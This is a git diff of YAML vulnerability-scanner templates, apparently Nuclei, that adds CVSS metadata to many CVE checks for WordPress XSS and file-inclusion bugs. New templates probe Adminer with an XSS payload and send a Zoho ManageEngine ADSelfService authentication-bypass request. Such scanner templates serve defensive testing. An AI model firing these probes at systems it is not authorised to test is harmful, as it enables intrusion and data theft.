- method: POST
diff --git a/CVE-2018-5316.yaml b/CVE-2018-5316.yaml
index 13f88cb..f2a21c4 100644
--- a/CVE-2018-5316.yaml
+++ b/CVE-2018-5316.yaml
@@ -7,6 +7,11 @@ info:
description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
tags: cve,cve2018,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-5316
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2018-6008.yaml b/CVE-2018-6008.yaml
index 65848e8..fc531f1 100644
--- a/CVE-2018-6008.yaml
+++ b/CVE-2018-6008.yaml
@@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/43913
- https://www.cvedetails.com/cve/CVE-2018-6008
tags: cve,cve2018,joomla,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2018-6008
+ cwe-id: CWE-200
requests:
- method: GET
diff --git a/CVE-2019-12276.yaml b/CVE-2019-12276.yaml
index a069b1a..a0cc848 100644
--- a/CVE-2019-12276.yaml
+++ b/CVE-2019-12276.yaml
@@ -9,6 +9,11 @@ info:
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2019-12276
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2019-14312.yaml b/CVE-2019-14312.yaml
index 33a5873..ba83455 100644
--- a/CVE-2019-14312.yaml
+++ b/CVE-2019-14312.yaml
@@ -3,12 +3,17 @@ id: CVE-2019-14312
info:
name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
author: daffainfo
- severity: high
+ severity: medium
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
reference:
- https://www.exploit-db.com/exploits/47214
- https://www.cvedetails.com/cve/CVE-2019-14312
tags: cve,cve2019,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2019-14312
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2019-14470.yaml b/CVE-2019-14470.yaml
index 05400bc..d956d71 100644
--- a/CVE-2019-14470.yaml
+++ b/CVE-2019-14470.yaml
@@ -8,6 +8,12 @@ info:
- https://wpscan.com/vulnerability/9815
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
tags: cve,cve2019,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-14470
+ cwe-id: CWE-79
+ description: "cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter."
requests:
- method: GET
diff --git a/CVE-2019-15713.yaml b/CVE-2019-15713.yaml
index e2cf961..052732a 100644
--- a/CVE-2019-15713.yaml
+++ b/CVE-2019-15713.yaml
@@ -9,6 +9,11 @@ info:
- https://wpscan.com/vulnerability/9267
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
tags: cve,cve2019,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-15713
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2019-15889.yaml b/CVE-2019-15889.yaml
index 6ccc20b..66a57ec 100644
--- a/CVE-2019-15889.yaml
+++ b/CVE-2019-15889.yaml
@@ -9,6 +9,11 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
tags: cve,cve2019,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-15889
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2019-16332.yaml b/CVE-2019-16332.yaml
index 4f4f378..988cb5d 100644
--- a/CVE-2019-16332.yaml
+++ b/CVE-2019-16332.yaml
@@ -9,6 +9,11 @@ info:
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-16332
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2019-16525.yaml b/CVE-2019-16525.yaml
index c2ccc90..c0b2649 100755
--- a/CVE-2019-16525.yaml
+++ b/CVE-2019-16525.yaml
@@ -7,6 +7,11 @@ info:
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
tags: cve,cve2019,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-16525
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2019-19134.yaml b/CVE-2019-19134.yaml
index 89c923f..5a3e696 100644
--- a/CVE-2019-19134.yaml
+++ b/CVE-2019-19134.yaml
@@ -7,6 +7,11 @@ info:
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
tags: cve,cve2019,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-19134
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2019-20085.yaml b/CVE-2019-20085.yaml
index 58a3857..605d0be 100755
--- a/CVE-2019-20085.yaml
+++ b/CVE-2019-20085.yaml
@@ -9,6 +9,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
- https://www.exploit-db.com/exploits/48311
tags: cve,cve2019,iot,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2019-20085
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2019-9618.yaml b/CVE-2019-9618.yaml
index e2a6243..58167af 100644
--- a/CVE-2019-9618.yaml
+++ b/CVE-2019-9618.yaml
@@ -3,12 +3,19 @@ id: CVE-2019-9618
info:
name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
author: daffainfo
- severity: high
+ severity: critical
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
+ - https://www.exploit-db.com/exploits/46537
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2019-9618
+ cwe-id: CWE-22
requests:
- method: GET
@@ -17,7 +24,6 @@ requests:
matchers-condition: and
matchers:
-
- type: regex
regex:
- "root:.*:0:0"
diff --git a/CVE-2020-11455.yaml b/CVE-2020-11455.yaml
index 88231d2..99abf2c 100644
--- a/CVE-2020-11455.yaml
+++ b/CVE-2020-11455.yaml
@@ -3,12 +3,17 @@ id: CVE-2020-11455
info:
name: LimeSurvey 4.1.11 - Path Traversal
author: daffainfo
- severity: high
+ severity: medium
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
reference:
- https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455
tags: cve,cve2020,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2020-11455
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2020-12054.yaml b/CVE-2020-12054.yaml
index 60bcb22..0ee177b 100644
--- a/CVE-2020-12054.yaml
+++ b/CVE-2020-12054.yaml
@@ -7,6 +7,11 @@ info:
description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-12054
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2020-17362.yaml b/CVE-2020-17362.yaml
index f448fae..dc16edb 100644
--- a/CVE-2020-17362.yaml
+++ b/CVE-2020-17362.yaml
@@ -7,6 +7,11 @@ info:
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-17362
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2020-29227.yaml b/CVE-2020-29227.yaml
index 469d3e0..b22baeb 100755
--- a/CVE-2020-29227.yaml
+++ b/CVE-2020-29227.yaml
@@ -3,12 +3,16 @@ id: CVE-2020-29227
info:
name: Car Rental Management System 1.0 - Local File Inclusion (LFI)
author: daffainfo
- severity: high
+ severity: critical
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
reference:
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
tags: cve,cve2020,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-29227
requests:
- method: GET
diff --git a/CVE-2020-29395.yaml b/CVE-2020-29395.yaml
index 1072df2..ca81ff5 100644
--- a/CVE-2020-29395.yaml
+++ b/CVE-2020-29395.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
tags: cve,cve2020,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-29395
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2020-35580.yaml b/CVE-2020-35580.yaml
index c5fa22a..1f23d2e 100755
--- a/CVE-2020-35580.yaml
+++ b/CVE-2020-35580.yaml
@@ -7,6 +7,11 @@ info:
description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
tags: cve,cve2020,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-35580
+ cwe-id: CWE-522
requests:
- method: GET
diff --git a/CVE-2020-35598.yaml b/CVE-2020-35598.yaml
index fe1febd..435cffa 100644
--- a/CVE-2020-35598.yaml
+++ b/CVE-2020-35598.yaml
@@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-35598
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2021-23241.yaml b/CVE-2021-23241.yaml
index 67b62f0..da0426c 100755
--- a/CVE-2021-23241.yaml
+++ b/CVE-2021-23241.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
tags: cve,cve2021,iot,lfi,router
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2021-23241
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2021-24235.yaml b/CVE-2021-24235.yaml
index 6da6293..1178e00 100644
--- a/CVE-2021-24235.yaml
+++ b/CVE-2021-24235.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
tags: cve,cve2021,wordpress,xss,wp-theme
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24235
+ cwe-id: CWE-79
+ description: "The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue."
requests:
- method: GET
diff --git a/CVE-2021-24298.yaml b/CVE-2021-24298.yaml
index 40b4fa6..2146243 100644
--- a/CVE-2021-24298.yaml
+++ b/CVE-2021-24298.yaml
@@ -7,6 +7,11 @@ info:
description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24298
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2021-24320.yaml b/CVE-2021-24320.yaml
index 408f23d..458e6b2 100644
--- a/CVE-2021-24320.yaml
+++ b/CVE-2021-24320.yaml
@@ -9,6 +9,11 @@ info:
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24320
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2021-24335.yaml b/CVE-2021-24335.yaml
index 960dfbe..89d2be4 100644
--- a/CVE-2021-24335.yaml
+++ b/CVE-2021-24335.yaml
@@ -7,6 +7,11 @@ info:
description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24335
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2021-24389.yaml b/CVE-2021-24389.yaml
index 3b6b1bb..024f7e7 100644
--- a/CVE-2021-24389.yaml
+++ b/CVE-2021-24389.yaml
@@ -7,6 +7,11 @@ info:
description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24389
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/CVE-2021-29625.yaml b/CVE-2021-29625.yaml
new file mode 100644
index 0000000..d5e3bd6
--- /dev/null
+++ b/CVE-2021-29625.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-29625
+
+info:
+ name: Adminer reflected XSS via the table parameter
+ author: daffainfo
+ description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
+ severity: medium
+ reference:
+ - https://sourceforge.net/p/adminer/bugs-and-features/797/
+ - https://www.cvedetails.com/cve/CVE-2021-29625/
+ tags: cve,cve2021,adminer,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-29625
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2021-33807.yaml b/CVE-2021-33807.yaml
index 7ffb782..4cee9b0 100644
--- a/CVE-2021-33807.yaml
+++ b/CVE-2021-33807.yaml
@@ -9,6 +9,11 @@ info:
- https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
tags: cve,cve2021,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-33807
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/CVE-2021-40539.yaml b/CVE-2021-40539.yaml
new file mode 100644
index 0000000..0da6945
--- /dev/null
+++ b/CVE-2021-40539.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-40539
+
+info:
+ name: Zoho ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE
+ author: daffainfo
+ severity: critical
+ description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.
+ reference:
+ - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539
+ tags: cve,cve2021,rce,zoho
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-40539
+ cwe-id: CWE-287
+
+requests:
+
+ - raw:
+ - |
+ POST /./RestAPI/LogonCustomization HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 27
+
+ methodToCall=previewMobLogo
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/wordpress-accessible-wpconfig.yaml b/wordpress-accessible-wpconfig.yaml
index 5347bbc..9a5ea5e 100644
--- a/wordpress-accessible-wpconfig.yaml
+++ b/wordpress-accessible-wpconfig.yaml
@@ -27,6 +27,8 @@ requests:
- '{{BaseURL}}/wp-config.php.orig'
- '{{BaseURL}}/wp-config.php.original'
- '{{BaseURL}}/_wpeprivate/config.json'
+
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
diff --git a/wp-church-admin-xss.yaml b/wp-church-admin-xss.yaml
index f5c5957..089b607 100644
--- a/wp-church-admin-xss.yaml
+++ b/wp-church-admin-xss.yaml
@@ -4,7 +4,7 @@ info:
name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
- reference: https://www.securityfocus.com/bid/54329/info
+ reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
tags: wordpress,xss,wp-plugin
requests:
diff --git a/wp-custom-tables-xss.yaml b/wp-custom-tables-xss.yaml
index c0918d7..958241d 100644
--- a/wp-custom-tables-xss.yaml
+++ b/wp-custom-tables-xss.yaml
@@ -5,7 +5,7 @@ info:
author: daffainfo
severity: medium
description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
- reference: https://www.securityfocus.com/bid/54326/info
+ reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
tags: wordpress,xss,wp-plugin
requests:
diff --git a/wp-finder-xss.yaml b/wp-finder-xss.yaml
index 1bbd462..d9dd385 100644
--- a/wp-finder-xss.yaml
+++ b/wp-finder-xss.yaml
@@ -4,7 +4,7 @@ info:
name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
- reference: https://www.securityfocus.com/bid/55217/info
+ reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
tags: wordpress,xss,wp-plugin
requests: